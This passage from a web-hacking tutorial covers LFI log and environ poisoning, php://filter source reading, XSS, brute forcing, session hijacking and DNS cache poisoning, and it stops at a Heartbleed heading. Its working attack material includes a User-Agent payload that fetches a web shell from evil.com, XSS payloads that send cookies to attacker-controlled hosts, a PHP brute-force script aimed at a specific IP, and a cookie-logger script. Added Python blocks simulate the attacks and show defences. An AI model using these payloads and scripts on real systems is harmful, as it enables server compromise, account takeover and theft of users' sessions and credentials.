This will write a file called "mmmmm" to /tmp/ which you can now include instead of the log files (just to make things a bit more practical). I won't go into further details on how to compromise a system. I basically served you your system's head on a plate. You got a working LFI, you poisoned the log file(s) and you got a system() code execution at /tmp/mmmmm.

/proc/self/environ

The /proc/self/environ method is a lot like log poisoning, just a lot simpler, and more commonly found (nowadays anyway). The environ file simply spits out information about the "environment" of the current process: information about the system, the user, the process and so on. Keep in mind that this isn't really a file, it's a stream whose contents change with the environment of the process that reads it. When PHP runs as a CGI or FastCGI process, the request headers are passed into that process's environment, so the environ stream will print out, among other things, the User-Agent header. This is what we will use to execute PHP code. (Note the GATEWAY_INTERFACE=CGI/1.1 line in the output below; under mod_php the environ belongs to the Apache worker and does not contain the request headers, so the trick does not work there.)

If you just include /proc/self/environ without any tampering, you should see something like this:

DOCUMENT_ROOT=/somepath/somepath/somepath
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,application/xml;q=0.9,application/xhtml+xml,image/png,image/jpeg,image/gif,image/x-xbitmap,*/*;q=0.1
HTTP_COOKIE=something=something
HTTP_HOST=www.site2.com
HTTP_USER_AGENT=Some user agent
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=127.0.0.1
REMOTE_PORT=41823
REQUEST_METHOD=GET
REQUEST_URI=/index.php?do=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/somepath/somepath/somepath/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=127.0.0.1
SERVER_ADMIN=webmaster@site2.com
SERVER_NAME=www.site2.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i Server at www.site2.com Port 80

You can see that it outputs a lot of info, like the User-Agent, which we will use to tamper with the output.

Now, use your favorite User-Agent switcher or tampering program. I can recommend Tamper Data or any User-Agent switcher extension for Firefox.

Change your User-Agent to <?php system("wget http://evil.com/myshell.txt -O /var/path/to/www/folder/myshell.php"); ?> (note the capital -O, which tells wget where to write the downloaded file; lowercase -o only redirects wget's log output).

And voilà! The environ stream now outputs your User-Agent PHP code back to the PHP script, which hopefully executes the code. If you did everything correctly, and everything worked as planned, you should now have a shell at /var/path/to/www/folder/myshell.php, which hopefully is www.site2.com/myshell.php, with the contents of http://evil.com/myshell.txt. Of course this is all proof-of-concept stuff, so you would have to change a lot of paths and so on. But this is how you do it anyway.

PHP filter(s)

The PHP filter method is basically just like a normal LFI, except that you can actually read the PHP source code of the files you include instead of executing it. This means we can read configuration files and the like for PHP scripts, which sometimes leads to some sort of access.

What we want to do is convert the data we get from reading the file into something that will not get executed when it goes through the include() function. Base64 encoding does this. With PHP filters you can convert the data you read from a file to base64 before it gets included. This way we get base64 output in our browser which, when decoded, is the PHP source code if you included a PHP file.

This is how you do it:

● www.site2.com/index.php?page=php://filter/read=convert.base64-encode/resource=YOURFILE

So, if you want to read config.php you do:

● www.site2.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php

config.php will most of the time contain some interesting information if it exists, like MySQL logins and whatnot (depending on the script, of course). You will get something looking like this in your browser: VGhpcyBpcyBhIGJhc2U2NCBzdHJpbmc=

You can decode it with this online tool: http://coderstoolbox.net/string/ or locally with base64 -d, which also avoids pasting a client's credentials into a third-party website.
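The three LFI techniques above (probing for a readable log, poisoning it with a raw request, and reading source through php://filter) as one small Python helper. This is an added example, not code from the book or from any tool it mentions; the target URL, parameter name, traversal depth and the fake server responses are assumptions constructed so it runs offline. Against a real target you are authorised to test, replace fake_fetch with a function that performs the HTTP GET and returns the body.

```python
# Added example (not from the book): helpers for the three LFI techniques above.
# The target URL, parameter name, traversal depth and the fake responses are
# assumptions constructed so the script runs offline; swap fake_fetch() for a
# real fetch (e.g. urllib.request.urlopen(url).read().decode()) on a live test.
import base64
import re
from urllib.parse import quote

# a subset of the common log locations listed in the text
COMMON_LOG_PATHS = [
    "/var/log/apache2/access.log",
    "/var/log/apache/access.log",
    "/var/log/httpd/access_log",
    "/usr/local/apache/logs/access_log",
    "/var/log/apache2/error.log",
    "/var/log/apache/error.log",
]

TRAVERSAL = "../" * 6   # assumed depth; six levels reaches / from most docroots


def lfi_url(base, param, path):
    """Build the traversal URL, e.g. index.php?page=../../../../../../etc/passwd"""
    return f"{base}?{param}={quote(TRAVERSAL + path.lstrip('/'), safe='/')}"


# one line of the Apache common/combined log format: "GET /path HTTP/1.1" 200
LOG_LINE = re.compile(r'"(GET|POST|HEAD) /[^"]*" \d{3} ')


def find_readable_log(fetch, base, param, paths=COMMON_LOG_PATHS):
    """Include each candidate path through the LFI and return the first one whose
    content looks like an Apache log, i.e. it exists and is readable."""
    for path in paths:
        body = fetch(lfi_url(base, param, path))
        if body and LOG_LINE.search(body):
            return path
    return None


def poison_request(host, php):
    """The raw request that puts PHP into the log. Send it over a plain socket or
    netcat: a browser would percent-encode the brackets and spoil the payload."""
    return f"GET /{php} HTTP/1.0\r\nHost: {host}\r\n\r\n"


def filter_url(base, param, resource):
    """php://filter makes include() return the file base64-encoded instead of running it."""
    return f"{base}?{param}=php://filter/read=convert.base64-encode/resource={resource}"


B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_source(body):
    """Pull the longest base64 run out of the returned page and decode it."""
    runs = B64_RUN.findall(body)
    if not runs:
        return None
    return base64.b64decode(max(runs, key=len)).decode("utf-8", "replace")


# --- constructed stand-in for the target, so the example runs offline -----------
BASE, PARAM = "http://www.site2.com/index.php", "page"
FAKE_RESPONSES = {
    lfi_url(BASE, PARAM, "/var/log/apache/access.log"):
        '10.0.0.5 - - [10/Oct/2016:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326\n',
    filter_url(BASE, PARAM, "config.php"):
        "<html>" + base64.b64encode(b"<?php $db_pass = 'secret'; ?>").decode() + "</html>",
}


def fake_fetch(url):
    return FAKE_RESPONSES.get(url, "<html>Warning: include(): failed to open stream</html>")


if __name__ == "__main__":
    print("readable log:", find_readable_log(fake_fetch, BASE, PARAM))
    print("config.php:", extract_source(fake_fetch(filter_url(BASE, PARAM, "config.php"))))
```

The log check looks for an Apache request line rather than just "any content", because a failed include typically still returns a page (often a PHP warning), and the base64 extractor takes the longest run so that surrounding HTML from the vulnerable page does not get in the way.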

Understanding XSS

Introduction

Cross Site Scripting (XSS for short; the older abbreviation CSS is still seen occasionally but is easily confused with Cascading Style Sheets) is one of the most common application-level attacks that hackers use to sneak into web applications today. Cross site scripting is an attack on the privacy of the clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties (the attacker and the web site, or the attacker and the victim client), the XSS attack involves three parties: the attacker, a client and the web site. The goal of the XSS attack is to steal the client's cookies, or any other sensitive information, which can identify the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site, specifically, impersonate the user. For example, in one audit conducted for a large company it was possible to peek at the user's credit card number and private information using an XSS attack. This was achieved by running malicious Javascript code in the victim's (client's) browser, with the "access privileges" of the web site. These are the very limited Javascript privileges which generally do not let the script access anything but site-related information. It should be stressed that although the vulnerability exists at the web site, at no time is the web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. The result: the attacker gains the cookies and impersonates the victim.

XSS Attack

Let us call the site under attack www.vulnerable.site. At the core of a traditional XSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or the path) and echoes it back to the response page, in full or in part, without first sanitizing it, i.e. making sure it doesn't contain Javascript code and/or HTML tags. Suppose, therefore, that this script is named welcome.cgi, and its parameter is "name". It can be operated this way:

And the response would be:

How can this be abused? Well, the attacker manages to lure the victim client into clicking a link the attacker supplies to him/her. This is a carefully and maliciously crafted link which causes the web browser of the victim to access the site (www.vulnerable.site) and invoke the vulnerable script. The data to the script consists of Javascript that accesses the cookies the client browser has for www.vulnerable.site. It is allowed, since the client browser "experiences" the Javascript as coming from www.vulnerable.site, and Javascript's security model allows scripts arriving from a particular site to access cookies belonging to that site.

Such a link looks like:

● http://www.vulnerable.site/welcome.cgi?name=

The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows:

And the vulnerable site's response would be:

The victim client's browser would interpret this response as an HTML page containing a piece of Javascript code. This code, when executed, is allowed to access all cookies belonging to www.vulnerable.site, and therefore it will pop up a window at the client browser showing all client cookies belonging to www.vulnerable.site.

Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may set up a web site (www.attacker.site) and use a script to receive the cookies. Instead of popping up a window, the attacker would write code that accesses a URL at his/her own site (www.attacker.site), invoking the cookie reception script with a parameter carrying the stolen cookies. This way, the attacker can collect the cookies from the www.attacker.site server.

The malicious link would be:

● http://www.vulnerable.site/welcome.cgi?name=<script>window.open("http://www.attacker.site/collect.cgi?cookie="%2Bdocument.cookie)</script>

And the response page would look like:

The browser, immediately upon loading this page, would execute the embedded Javascript and would send a request to the collect.cgi script on www.attacker.site, with the value of the cookies of www.vulnerable.site that the browser already has.

This compromises the cookies of www.vulnerable.site that the client has. It allows the attacker to impersonate the victim. The privacy of the client is completely breached.
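The welcome.cgi reflection described above, modelled in Python as an added example (not the page's code): the vulnerable sink that echoes the parameter unchanged, beside the same page with the one change that neutralises the attack, HTML-escaping the untrusted value before it is written into the response. The surrounding HTML of the welcome page is an assumption; the page only says the parameter is echoed back.

```python
# Added example (not from the page): the welcome.cgi reflection as a vulnerable
# sink and its escaped form. The HTML wrapper is assumed; the payload is the one
# from the malicious link in the text.
import html
from urllib.parse import urlencode

VULNERABLE_SITE = "http://www.vulnerable.site/welcome.cgi"

# the payload from the malicious link in the text
COOKIE_STEALER = ('<script>window.open("http://www.attacker.site/collect.cgi?cookie="'
                  '+document.cookie)</script>')


def welcome_vulnerable(name):
    """Echoes the request parameter straight into the response: the XSS sink."""
    return f"<html><title>Welcome!</title>Hi {name}<br>Welcome to our system...</html>"


def welcome_fixed(name):
    """Same page, but the untrusted value is HTML-escaped before it is echoed, so
    '<' becomes '&lt;' and the browser renders the payload as text, not markup."""
    safe = html.escape(name, quote=True)
    return f"<html><title>Welcome!</title>Hi {safe}<br>Welcome to our system...</html>"


def malicious_link(payload=COOKIE_STEALER):
    """The link the attacker lures the victim into clicking (query-string encoded)."""
    return VULNERABLE_SITE + "?" + urlencode({"name": payload})


def executes_script(page):
    """Stand-in for the browser: does the response contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(malicious_link())
    print("vulnerable page runs script:", executes_script(welcome_vulnerable(COOKIE_STEALER)))
    print("fixed page runs script:", executes_script(welcome_fixed(COOKIE_STEALER)))
```

Escaping at the point of output is the fix the page's description implies: the script still reads the parameter and still echoes it, but the characters that would turn text into markup (< > & " ') are encoded, so a benign name like "Joe" renders identically and the payload renders as literal text.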

Understanding Broken Authentication and Session Management

Authentication and session management include all aspects of handling user authentication and managing active sessions. Authentication is mostly done by username and password, and the session must then be managed after authentication has been confirmed. Errors in handling either of these can lead to the hijacking of user or administrative accounts, undermine authorization and accountability controls, and cause privacy violations.

Due to vulnerable authentication and session management, many attacks can be carried out by an attacker. I will be explaining the following two types of attack:

● Brute Force Attack

● Session hijacking

Brute Force Attack

A brute force attack is a particularly sinister way for those with malicious intent to gain access to a server. The premise of this type of attack is ultimately to obtain root access in order to accomplish whatever goal the attacker may have. To do this, the attacker typically uses software that guesses the password through many failed login attempts. If there is no protection in place, these failed login attempts can continue indefinitely until it guesses correctly.

To find out whether a website is vulnerable to a brute force attack, we can check manually. Go to the login page of that site and, for a particular username, try several wrong passwords. If the site does not ask for extra information (such as a CAPTCHA), does not lock the account and does not slow you down, but simply lets you keep trying passwords, the website is vulnerable to brute force. If it is, you can apply the method given below.

The method for the brute force attack is given below:

To do the brute force attack I am using a PHP script. To run this script we need a local server such as XAMPP, so first install XAMPP on your PC.

Limitations of this PHP script

● The login page you are attacking must use a form to get the username and password.

● This script only tries different passwords, so you must have a valid username for that website.

If the website satisfies these two conditions, you can attack with this method. One login page is shown:

The red circle is the text field for the username and the blue circle is the text field for the password. Right click on this page and click the "view source" option. You will get the following page:

In this page search for the username field and you will see the following part:

In this page look for the <form> to </form> part.

In this form the name of the username text field is userid and the password text field is password. It is submitted to loginvalidate.jsp when clicking submit. This information is used in the PHP script.

PHP script for the brute force attack

<?php
// Brute force a form login: POST each password from password.txt for one username.

function CheckItOut($user, $pass)
{
    // URL the form is submitted to (the action of the login form)
    $url = 'http://220.227.240.189:8000/ICMS/loginvalidate.jsp';

    $fields = array(
        'userid'   => $user,   // userid is the name of the username field
        'password' => $pass,   // password is the name of the password field
    );

    // url-encode the data for the POST body
    $fields_string = http_build_query($fields);

    // open connection
    $ch = curl_init();

    // set the url, mark the request as a POST and attach the POST data
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);

    // execute the post
    $result = curl_exec($ch);
    $info = curl_getinfo($ch);

    // close connection
    curl_close($ch);

    return $info['http_code'];
}

set_time_limit(0);               // a long word list takes longer than PHP's default 30 seconds

$filename = "password.txt";      // all the passwords you want to try, one per line
$file = fopen($filename, 'r');
$user = "puneet";

while (!feof($file))
{
    $pass = rtrim(fgets($file), "\r\n");   // strip the line ending
    if ($pass === '') continue;

    $check = CheckItOut($user, $pass);

    // The script treats an HTTP 200 reply as success. Check first what the
    // target returns for a wrong password: many sites answer a failed login
    // with 200 as well, in which case you must look at the response body or
    // for a redirect instead of the status code.
    if ($check == 200)
    {
        echo "Password for this Username = $user is: ";
        echo $pass;
        break;
    }
}

fclose($file);
?>

Note: password.txt should be in the same directory in which this script is run.

Results

On running this script, if any password matches for the given username it will show the result "Password for this Username = $user is: _________". Otherwise it will show a blank page. So, the above is the method for a brute force attack on a vulnerable website.
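The same password-guessing loop in Python, as an added example (not the book's script), with two things a practitioner wants that the PHP version lacks: a success test that does not rely on HTTP 200 alone (a redirect that sets a session cookie, or a 200 without a failure message) and a stop on account lockout so the rest of the word list is not wasted. The username, the word list and the fake login server are constructed for offline use; replace post_login with a real HTTP client for an authorised test.

```python
# Added example (not the book's script): form-login guessing with a response-based
# success test and lockout detection. The username, word list and fake_login()
# server are constructed so that the example runs offline.
from dataclasses import dataclass, field


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


FAILURE_MARKERS = ("invalid", "incorrect", "login failed", "wrong password")
LOCKOUT_MARKERS = ("locked", "too many attempts", "try again later")


def looks_successful(resp):
    """True for a successful login, False for a rejected one, None for lockout.
    A redirect that sets a cookie is the usual success signal; a 200 whose body
    says 'Invalid password' is still a failure even though the status is 200."""
    body = resp.body.lower()
    if any(m in body for m in LOCKOUT_MARKERS):
        return None
    header_names = {k.lower() for k in resp.headers}
    if resp.status in (301, 302, 303) and "set-cookie" in header_names:
        return True
    if resp.status == 200 and not any(m in body for m in FAILURE_MARKERS):
        return True
    return False


def brute_force(post_login, user, wordlist):
    """Try each candidate; returns ('found', pw), ('locked', pw) or ('exhausted', None)."""
    for raw in wordlist:
        pw = raw.rstrip("\r\n")       # word lists carry CRLF or LF line endings
        if not pw:
            continue
        verdict = looks_successful(post_login(user, pw))
        if verdict is None:
            return ("locked", pw)
        if verdict:
            return ("found", pw)
    return ("exhausted", None)


# --- constructed stand-in for the login form ----------------------------------
def fake_login(user, pw):
    if user == "puneet" and pw == "summer2016":
        return Response(302, {"Location": "/home", "Set-Cookie": "JSESSIONID=abc123"})
    return Response(200, {}, "<html>Invalid username or password</html>")


def with_lockout(limit):
    """Wrap fake_login so that it locks the account after `limit` attempts."""
    count = {"n": 0}

    def login(user, pw):
        count["n"] += 1
        if count["n"] > limit:
            return Response(200, {}, "<html>Account locked: too many attempts</html>")
        return fake_login(user, pw)
    return login


WORDLIST = ["123456\r\n", "password\r\n", "summer2016\r\n", "letmein\r\n"]   # constructed

if __name__ == "__main__":
    print(brute_force(fake_login, "puneet", WORDLIST))
    print(brute_force(with_lockout(2), "puneet", WORDLIST))
```

The failure and lockout marker lists are deliberately simple; before running against a real form, submit one known-bad password by hand and copy the exact wording of the rejection into FAILURE_MARKERS, otherwise a site that answers every login with 200 will be reported as "found" on the first guess.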

Session Hijacking

In computer science, session hijacking is the exploitation of a valid computer session (sometimes also called a session key) to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

What is a cookie?

A cookie, also known as a web cookie or HTTP cookie, is a small piece of text stored by the user's browser. A cookie is sent as a header by the web server to the web browser on the client side. A cookie is static and is sent back by the browser unchanged every time it accesses the server.

A cookie has an expiration time that is set by the server, and it is deleted automatically after the expiration time.

Cookies are used to maintain a user's authentication and to implement a shopping cart during navigation, possibly across multiple visits.

What can we do after stealing a cookie?

Well, as we know, websites authenticate their users with a cookie, so it can be used to hijack the victim's session. Replace your own cookie with the victim's stolen cookie and the site will treat your browser as the victim's session.

The following is a cookie stealing script which is to be stored on the attacker's host. It receives the cookie data and stores it in a text file.

<?php
// Cookie logger: receives the stolen cookie in the query string and appends it,
// together with details of the visiting browser, to log.txt.

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return $ip;
}

function logData()
{
    $ipLog = "log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();
    $rem_port    = $_SERVER['REMOTE_PORT'];
    $user_agent  = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['REQUEST_METHOD'];
    // REMOTE_HOST is only set when the server does reverse lookups; the referer may be absent
    $rem_host    = isset($_SERVER['REMOTE_HOST']) ? $_SERVER['REMOTE_HOST'] : '';
    $referer     = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
    $date = date("l dS of F Y h:i:s A");
    $log = fopen($ipLog, "a+");
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{:} $date | COOKIE: $cookie\n");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie\n\n");
    fclose($log);
}

logData();
?>

Save the script as cookielogger.php on your server (any free web hosting site such as justfree, x10hosting etc.). Also create an empty text file, name it log.txt and upload it.

Look for user-interactive sites which contain comments or forums. Post the following code, which invokes the cookie logger on your host:

<script language="Javascript">document.location="http://www.yourhost.com/cookielogger.php?cookie="+document.cookie;</script>

This only works if the site stores your post without HTML-encoding it (a stored XSS) and if the session cookie is not marked HttpOnly, which keeps it out of document.cookie.
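The two conditions above can be checked from the defending side as well. The following added example (not from the page) audits the Set-Cookie headers a site sends for the attributes that defeat this theft: HttpOnly keeps the cookie out of document.cookie so the posted script cannot read it, Secure keeps it off plain HTTP where an intermediary could sniff it, and SameSite keeps it off cross-site requests. The sample headers are constructed.

```python
# Added example (not from the page): audit Set-Cookie headers for the attributes
# that blunt cookie theft via XSS or an intermediary. Sample headers are constructed.

def parse_set_cookie(header):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr: val or True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value.strip(), attrs


def audit_cookie(header):
    """Return (cookie name, list of weaknesses) for one Set-Cookie header."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("no HttpOnly: readable via document.cookie, so XSS can exfiltrate it")
    if "secure" not in attrs:
        findings.append("no Secure: also sent over plain HTTP, exposing it to an intermediary")
    samesite = str(attrs.get("samesite", "")).lower()
    if samesite in ("", "none"):
        findings.append("SameSite unset or None: attached to cross-site requests")
    return name, findings


def visible_to_script(headers):
    """Names of cookies that document.cookie would expose: the ones without HttpOnly."""
    return [parse_set_cookie(h)[0] for h in headers
            if "httponly" not in parse_set_cookie(h)[2]]


# constructed responses from a weak and a hardened site
WEAK_HEADERS = ["PHPSESSID=9f2c8e1a; path=/"]
HARDENED_HEADERS = ["PHPSESSID=9f2c8e1a; Path=/; Secure; HttpOnly; SameSite=Lax",
                    "theme=dark; Path=/; Secure"]

if __name__ == "__main__":
    for h in WEAK_HEADERS + HARDENED_HEADERS:
        name, findings = audit_cookie(h)
        print(name, "->", findings or "ok")
    print("exposed to document.cookie:", visible_to_script(WEAK_HEADERS), visible_to_script(HARDENED_HEADERS))
```

Only the session cookie needs all three flags; a preference cookie such as theme being readable by script is harmless, which is why visible_to_script is reported per cookie rather than per site.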

Understanding DNS Cache Poisoning

The Domain Name System (DNS) is an essential part of the Internet. The primary purpose of DNS is to resolve symbolic domain names to IP addresses. Many Internet security mechanisms, including host access control and defenses against spam and phishing, implicitly or explicitly depend on the integrity of the DNS infrastructure. Unfortunately, security was not one of the design considerations for DNS, and many attacks on DNS have been reported over the years.

Cache poisoning is arguably the most prominent and dangerous attack on DNS. DNS cache poisoning results in a DNS resolver storing (i.e., caching) invalid or malicious mappings between symbolic names and IP addresses. Because the process of resolving a name depends on authoritative servers located elsewhere on the Internet, the DNS protocol is intrinsically vulnerable to cache poisoning. An attacker may poison the cache by compromising an authoritative DNS server or by forging a response to a recursive DNS query sent by a resolver to an authoritative server.

Many non-cryptographic defenses focus solely on blind response forgery and attempt to solve the problem by increasing the entropy of DNS query components such as transaction IDs, query labels, and port numbers. This makes blind response forgery more difficult. Unfortunately, blind response forgery is just one of the possible attack vectors for DNS cache poisoning and, unlike cryptographic solutions, these defenses are vulnerable to trivial eavesdropping attacks. Therefore, they do not address the root causes of DNS cache poisoning and provide only partial protection.

DNS Background

DNS is a distributed storage system for Resource Records (RR). Each DNS resolver or authoritative server stores RRs in its cache or local zone file. A Resource Record includes a label, class, type, and data. The label of an RR is a symbolic domain name used when accessing an Internet resource. The class is either IN or CH; the class of most RRs is IN, which means the Internet system. The type can have many possible values, but we will focus on records of type A, CNAME, and NS. An A record holds a mapping from a domain name to an IP address, a CNAME record holds a mapping from a domain name to an alias, and an NS record holds a mapping from a domain name to the name of an authoritative name server for that domain. Each record has a time-to-live (TTL) parameter and is purged from the cache once its TTL expires.

No two RRs in the cache may have the same label, class, type, and data, but it is possible to have multiple records with the same label, class, and type. Such a group is called a Resource Record Set (RRset).

Caching and recursive resolution

When a DNS resolver or authoritative server receives a query, it searches its cache for a matching label. If there is no matching label in the cache, the server may instead retrieve from the cache and return a referral response, containing an RRset of NS type whose label is "closer" to the domain which is the subject of the query.

Instead of sending a referral response, the DNS resolver may also be configured to initiate the same query to an authoritative DNS server responsible for the domain name which is the subject of the query. Each query is identified by a random 16-bit transaction ID (TXID). The authoritative server can respond with an answer, a referral, or a failed response. In general, a response is comprised of the query, answer, authority, and additional sections. Each section may have none, one, or multiple RRsets.

The authoritative server's response, or a forged message pretending to be the authoritative server's response, is accepted by the DNS resolver and stored in its cache only if the RRset of each section passes a set of conditions known as the bailiwick rule. These conditions are not part of the DNS specification and depend on the implementation of the resolver. Furthermore, in certain circumstances, the received records may even overwrite those already stored in the cache.

Poisoning the DNS cache by adding false records is a serious threat, but DNS records corresponding to popular domains are likely to be already stored in the cache prior to an attack and are thus not vulnerable to the basic forgery exploit (this observation underlies the naive defense of increasing the time-to-live parameter of these records). It is the ability to overwrite existing records that makes DNS response forgery such a devastating attack. To understand record overwriting, we need to understand the mechanism through which an attacker may introduce forged records into the cache of a DNS resolver and the bailiwick and trust-level rules that govern addition and overwriting of records in DNS caches.

Cache poisoning without response forgery

Before BIND adopted the bailiwick rule in 1993, the owner of any DNS authoritative server could compromise records corresponding to any domain name. When responding to a query from the resolver, a malicious authoritative server can send, in the additional section of its response, an arbitrary mapping from any domain name (including those outside its authority) to an IP address.

For instance, consider a malicious authoritative server for bad.com. When a client asks its DNS resolver to resolve www.bad.com, the resolver queries the server. The server's response contains in its additional section the mapping from, say, ns1.good.com to a malicious IP address. Without the bailiwick rule, this mapping would have been cached by the resolver, even though good.com was neither part of the query, nor under the malicious server's authority.

Blind response forgery using the birthday attack

The basic DNS protocol does not authenticate responses to recursive queries. The only checks are: (1) the query section and 16-bit transaction ID (TXID) of the response must match those of the query, and (2) the source IP address and destination port of the response must match, respectively, the destination IP address and source port of the query. The first arriving UDP packet which satisfies these conditions is treated as a valid response from the authoritative server.

Prior to recent patches, many DNS resolvers used a fixed port to send queries. Therefore, with the exception of a random TXID, all values used by the resolver to determine the validity of a packet received in response to its query are predictable. To generate a valid-looking response, it is sufficient to guess the TXID used in the query.

Attacks on DNS exploiting the "birthday paradox" have been known since at least 2002 [21]. If the TXID has only N bits of entropy (in practice, N = 16), a network attacker needs only O(2^(N/2)) trials on average to generate a forged response which matches the TXID of the query and will thus be accepted as valid by the target resolver. The answer section of the forgery contains a malicious mapping from a domain name to an IP address.

For the attack to succeed, the forgery must arrive at the target resolver before the response from the legitimate authoritative server. If the legitimate response arrives first, it will be cached by the resolver and, until its time-to-live (TTL) expires, the resolver will not ask the authoritative server to resolve the same domain name, preventing the attacker from poisoning the mapping for that domain.

Kaminsky's exploit. At Black Hat 2008, Kaminsky presented a new extension of the birthday attack. While the basic mechanism is the same (using the birthday attack to forge a response with the same transaction ID as the query), three observations make Kaminsky's attack more serious than "conventional" DNS forgery.

First, the attacker can force the target resolver to initiate a query to an authoritative server of his choice. Second, modern attackers have enough network bandwidth to generate a large number of spoofed responses, each with a different guess of the transaction ID. Third, the malicious "payload" of the forged response is the additional section (as opposed to the answer section in the conventional attack), for reasons explained below.

The basic scheme of the exploit is as follows. The attacker chooses the domain name that he wants to compromise (e.g., www.google.com). He then queries the target resolver with any subdomain which is not already cached on the resolver (e.g., a non-existent subdomain such as xyz12.google.com). Because the name is not in the cache, this causes the target resolver to send a query to the authoritative server(s) for this domain. At this point, the attacker floods the resolver with a large number of forged responses, each containing a different guess of the query's transaction ID. If a forgery attempt fails, the attacker can immediately start a new race, using a different domain name, and continue until he actually wins the race, i.e., a forgery with a valid transaction ID arrives at the resolver before the legitimate answer.
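The arithmetic behind the three attacks just described, as an added example (not from the page): plain blind forgery against one outstanding query, the birthday variant against a resolver that has several identical queries in flight, and Kaminsky's repeated races, plus the effect of adding a randomised source port to the 16-bit TXID. The formulas are the standard ones; the parameter values are illustrative, not measurements.

```python
# Added example (not from the page): success probability of blind forgery,
# the birthday variant, and the number of Kaminsky-style races to expect.
# Parameter values are illustrative; entropy_bits=16 is the bare TXID and
# entropy_bits=32 models TXID plus a randomised 16-bit source port.

def forgery_success(guesses, outstanding=1, entropy_bits=16):
    """Probability that at least one of `guesses` distinct forged responses carries
    an ID matching one of `outstanding` concurrent queries, each ID uniform over
    2**entropy_bits values. outstanding=1 is the plain attack (p = guesses / 2^N);
    outstanding > 1 is the birthday attack against resolvers that send several
    identical queries at once. Computed exactly as 1 - C(S-g, m) / C(S, m)."""
    space = 2 ** entropy_bits
    guesses = min(max(guesses, 0), space)
    p_no_match = 1.0
    for i in range(outstanding):
        p_no_match *= max(space - guesses - i, 0) / (space - i)
    return 1.0 - p_no_match


def expected_races(guesses_per_race, outstanding=1, entropy_bits=16):
    """Kaminsky-style attack: each lost race is retried with a fresh random name,
    so the number of races until the first win is geometric with mean 1/p."""
    p = forgery_success(guesses_per_race, outstanding, entropy_bits)
    return float("inf") if p == 0 else 1.0 / p


def guesses_for(target_probability, outstanding=1, entropy_bits=16):
    """Smallest number of forged responses per race reaching the target probability."""
    lo, hi = 0, 2 ** entropy_bits
    while lo < hi:                       # binary search; success is monotone in guesses
        mid = (lo + hi) // 2
        if forgery_success(mid, outstanding, entropy_bits) >= target_probability:
            hi = mid
        else:
            lo = mid + 1
    return lo


if __name__ == "__main__":
    print("one query, 1000 forgeries, 16-bit TXID:", forgery_success(1000))
    print("256 outstanding queries, 256 forgeries (birthday):", forgery_success(256, 256))
    print("guesses for 50% with one query:", guesses_for(0.5), "with 256 queries:", guesses_for(0.5, 256))
    print("races to win with 65536 forgeries/race, TXID+port:", expected_races(2 ** 16, entropy_bits=32))
```

The last line is the point of source-port randomisation: with 65,536 forged packets per race an attacker wins every race against a bare TXID, but needs about 65,536 races on average against TXID plus port, and each race is bounded by the legitimate answer's arrival time. The birthday numbers show why resolvers stopped issuing duplicate outstanding queries for the same name.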

Understanding Heartbleed

